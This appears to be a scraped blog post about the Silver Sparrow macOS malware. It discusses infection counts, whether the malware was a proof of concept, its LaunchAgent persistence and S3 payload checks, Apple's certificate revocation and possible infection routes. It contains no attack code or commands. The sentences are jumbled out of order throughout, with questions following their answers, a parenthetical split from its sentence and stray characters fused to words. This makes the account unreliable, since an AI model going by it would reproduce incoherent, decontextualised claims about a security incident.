For example, there’s the fact that at least tens of thousands of Macs have been hit with this malware. However, there are good reasons to think that Silver Sparrow is not merely a proof of concept. Image credit: Erika Noerenberg via Red Canary “Hello, World!” message from OSX/Slisp variant 1. In other words, after the malware gets installed, it has not yet been observed to download and install additional components that can cause further harm or enhance its functionality, as the malware appears designed to do.įurthermore, the first sample actually installs an app that, if opened, displays a message saying, “Hello, World!”-which is normally a shorthand way for a programmer to say, “This is my first attempt at making this app, and if you’re seeing this message, then the app works!” Proponents of the proof-of-concept theory point out that researchers have not yet observed the malware installing any further malicious payloads. There are a couple of indicators that have caused some to speculate that Silver Sparrow might have just been a proof of concept that somehow became widely distributed. Is Silver Sparrow really malware, or a mere proof of concept (PoC)? However, this is only speculation, and this theory unfortunately cannot be confirmed based on the currently available evidence. Theoretically, before revocation of their Apple certificates and cancelation of their S3 buckets, it’s possible that a final payload may have been available for a short period of time, or may have only been made available to certain victims. It appears that Amazon may have shut down the S3 buckets that were associated with the two known Silver Sparrow variants. The LaunchAgent would check an Amazon AWS S3 bucket for further instructions and a potential additional malicious payload, but so far researchers have not yet observed the malware downloading any final payloads. a way for the malware to continue running, even after a victim restarts their Mac). However, it’s worth noting that Apple’s mitigation efforts may not necessarily remove all existing malware infections, and may not block potential future Silver Sparrow variants that would presumably be signed with yet another Apple Developer ID.īefore Apple’s revocation of the code-signing certificates, the malware would install a LaunchAgent as a “persistence” method (i.e. Because the malware is no longer signed by an authorized Apple Developer ID, the two known variants of the malware won’t be able to run anymore if someone tries to install them today. Apple addressed the two known variants of Silver Sparrow by revoking the developer’s code-signing certificates. What potential harm can Silver Sparrow do to Macs?Īt this time, the malware installer packages will no longer run. and are about to chat all things Silver Sparrow. Katie Nickels, a representative from Red Canary (the company that discovered the malware), suggested in a live stream on Monday that another possible source of infection may have been malicious browser extensions. There are some indications that end-users may have encountered the malware via poisoned Google search results, meaning results leading to legitimate sites that had been compromised by a threat actor, and/or malicious sites that rank highly for particular searches. How can one remove or prevent Silver Sparrow and other threats?Īs of this moment, malware researchers have not yet conclusively identified how Silver Sparrow installation packages have made their way onto Macs.Silver Sparrow has had wide distribution, but its goal is unknown. Silver Sparrow uses JavaScript during installation.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |